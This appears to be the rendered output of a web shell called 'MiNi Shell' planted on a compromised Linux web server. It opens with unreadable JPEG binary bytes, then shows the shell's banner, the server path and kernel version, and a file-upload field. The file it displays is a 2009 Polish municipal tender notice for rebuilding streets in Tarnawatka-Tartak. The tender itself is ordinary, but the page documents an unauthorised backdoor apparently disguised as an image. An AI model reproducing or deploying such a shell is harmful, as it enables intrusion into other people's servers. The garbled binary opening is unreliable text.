JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/268218-N-2009.html

<p class="kh_header"><b>Tarnawatka: Przebudowa ulic w miejscowości Tarnawatka-Tartak</b><br>
<b>Numer ogłoszenia: 268218 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Tarnawatka , ul. Lubelska 39, 22-604 Tarnawatka, woj. lubelskie, tel. 0-84 662-47-10, faks 0-84 662-47-24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnawatka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic w miejscowości Tarnawatka-Tartak.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na przebudowie ulic w miejscowości Tarnawatka-Tartak (drogi klasy L) :
Zakłada się wykonanie podbudowy betonowej. Dopuszcza się złożenie oferty wariantowej na podbudowę: na przykład z materiałów kamiennych - tłuczniowa lub katalityczno - polimerowa stabilizacja gruntów lub innej równoważnej, spełniającej wymagania projektowe.
Drogi klasy L
Kategoria KR 1
Podłoże G 2
Ulice: 
I. ul. TOPOLOWA  od km 0+002,75 do km 0+455,00
II. ul.  SŁONECZNA od km 0+025,00 do km 0+337,75
III. ul. Nr 77 od 0+002,75 do km 0+156,00
IV. ul. FABRYCZNA od km 0+002,75 do km 0+130,00

I. ul. TOPOLOWA
1) zakres rzeczowy robót:
- roboty pomiarowe
- roboty ziemne 
- wykonanie warstwy odsączającej o grubości 10 cm - 1729,80 m2
- wykonanie podbudowy betonowej warstwą 20 cm - 1729,80 m2
- wykonanie poboczy utwardzonych z kruszywa łamanego - 450,50 m2,
2) parametry techniczne
- szerokość jezdni 3,5 m
- pobocze utwardzone szerokości 0,5 m
3) założenia projektowe
- kategoria KR 1
- podłoże G2
- szybkość projektowa 10 km

II. ul. SŁONECZNA
1) zakres rzeczowy robót:
- roboty pomiarowe
- roboty ziemne
- wykonanie warstwy odsączającej o grubości 10 cm - 1641,80 m2
- wykonanie podbudowy betonowej warstwą 20 cm - 1641,80 m2
- wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm (warstwa wiążąca) - 1610,50 m2
- wykonanie poboczy utwardzonych z kruszywa łamanego 456,30 m2
2) parametry techniczne
- jezdnia o szerokości 5,00 m
- pobocze utwardzone szerokości 0,75 m 
3) założenia projektowe
- kategoria ruchu KR 1
- podłoże G2
- szybkość projektowa 50 km/h

III. ul. DROGA NR 77
1) zakres rzeczowy robót:
- roboty pomiarowe
- roboty ziemne  
- wykonanie warstwy odsączającej o grubości 10 cm - 622,10 m2 
- wykonanie podbudowy betonowej warstwą 20 cm - 622,10 m2  
- wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm   (warstwa wiążąca?) - 606,70 m2                                                                                                                   - wykonanie poboczy utwardzonych z kruszywa łamanego - 154,60 m2
2) parametry techniczne
- jezdnia szerokości 3,5 m
- pobocza utwardzone szerokości 0,50 m
3) założenia projektowe
- kategoria ruchu KR 1
- podłoże G2
- szybkość projektowa 10 km/h

IV. ul. FABRYCZNA 
1) zakres rzeczowy robót:
- roboty pomiarowe
- roboty ziemne
- wykonanie warstwy odsączającej o grubości 10 cm - 525,00 m2
- wykonanie podbudowy betonowej warstwą 20 cm - 525,00 m2
- wykonanie poboczy utwardzonych kruszywem łamanym - 120,00 m2
2) parametry techniczne
- jezdnia szerokości :
od km 0+002,75 do km 0+023,00 - 5,0 m
od km 0+023,00 do km 0+043,00 - od 5,00 m do 3,5 m
od km 0+043,00 do km 0+130,00 - 3,5 m
- pobocza utwardzone szerokości 0,50 m
3) założenia projektowe
- kategoria ruchu KR 1
- podłoże G 2
- szybkość projektowa 10 km/h.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22, oraz nie są wykluczeni na podst. art. 24 ustawy - Prawo zamówień publicznych ( Dz. U. z 2007 r. Nr 223, poz. 1655 )
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia.
W celu potwierdzenia spełniania tego warunku, wykonawcy zobowiązani są przedłożyć następujące dokumenty i oświadczenia:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert,
b) złożą oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy - Prawo zamówień publicznych.
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, należy dołączyć do oferty następujące dokumenty: 
a) wykaz wykonanych robót budowlanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,  z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie, (wykonawca musi wykazać, że zrealizował minimum dwa zadania polegające na: budowie, odbudowie lub przebudowie dróg, w technologii odpowiedniej do przedmiotu zamówienia, tj. budowa, przebudowa, lub odbudowa dróg o podbudowie betonowej lub równoważnej oraz nawierzchni z mieszanek mineralno-bitumicznych asfaltowych spełniających wymagania siwz oraz projektu, odcinki o długości minimum 1000 mb), 
b) wykaz niezbędnego do wykonania zamówienia sprzętu, jakim dysponuje wykonawca (minimum: koparka podsiębierna o poj. łyżki 0,25-0,6 m3, spycharka, samochód samowyładowczy o ład. min. 12 ton, równiarka, walec drogowy, maszyna do wykonywania podbudowy, maszyna do wykonywania nawierzchni asfaltowych),
c) wykaz osób, które będą uczestniczyć przy wykonaniu zamówienia wraz z podaniem ich przygotowania zawodowego ( w tym : minimum 1 osoba z uprawnieniami do kierowania robotami polegającymi na budowie dróg ).
3) W celu potwierdzenia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, należy dostarczyć dokumenty:
a) informacja banku, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy do kwoty minimum 600 tysięcy złotych, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
b) polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 600 tysięcy złotych,
c) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie              w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4) Nie podlegają wykluczeniu z postępowania.
a) wykonawca musi złożyć oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia, na podstawie art. 24 ustawy - Prawo zamówień publicznych,
b) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKAZ DOKUMENTÓW I OŚWIADCZEŃ, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU.
1) Wypełniony druk Oferty, sporządzony na podst. wzoru, załącznik nr 1 do SIWZ.
2) Kosztorys Ofertowy, zał. Nr 2 do SIWZ.
3) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5) Aktualne zaświadczenie właściwego oddziału ZUS lub KRUS, wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert.
6) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 ustawy - Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7) Oświadczenie o spełnieniu warunków udziału w postępowaniu, na podstawie art. 44 ustawy - Prawo zamówień publicznych.
8) Wykaz zrealizowanych w ciągu trzech lat (2006-2008) zadań odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (budowa, odbudowa lub przebudowa dróg o nawierzchni z emulsji asfaltowych), z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. Odcinki o długości minimum 1000 mb każdy.
9) Wykaz niezbędnego sprzętu do wykonania zadania, jakim dysponuje wykonawca, jak w pkt 6 specyfikacji.
10) Wykaz osób, które będą uczestniczyć przy wykonaniu zamówienia.
11) Informacja banku, w którym wykonawca posiada rachunek.
12) Polisa, lub inny dokument poświadczający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
13) Oświadczenie wykonawcy, że nie podlega on wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych.

	 Dokumenty powinny być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Zamawiający zażąda przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Okres realizacji (w dniach) - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tarnawatka.bip.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Tarnawatka
ul. Lubelska 39
22-604 Tarnawatka.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 11:30, miejsce: Urząd Gminy Tarnawatka
ul. Lubelska 39
22-604 Tarnawatka
pokój nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com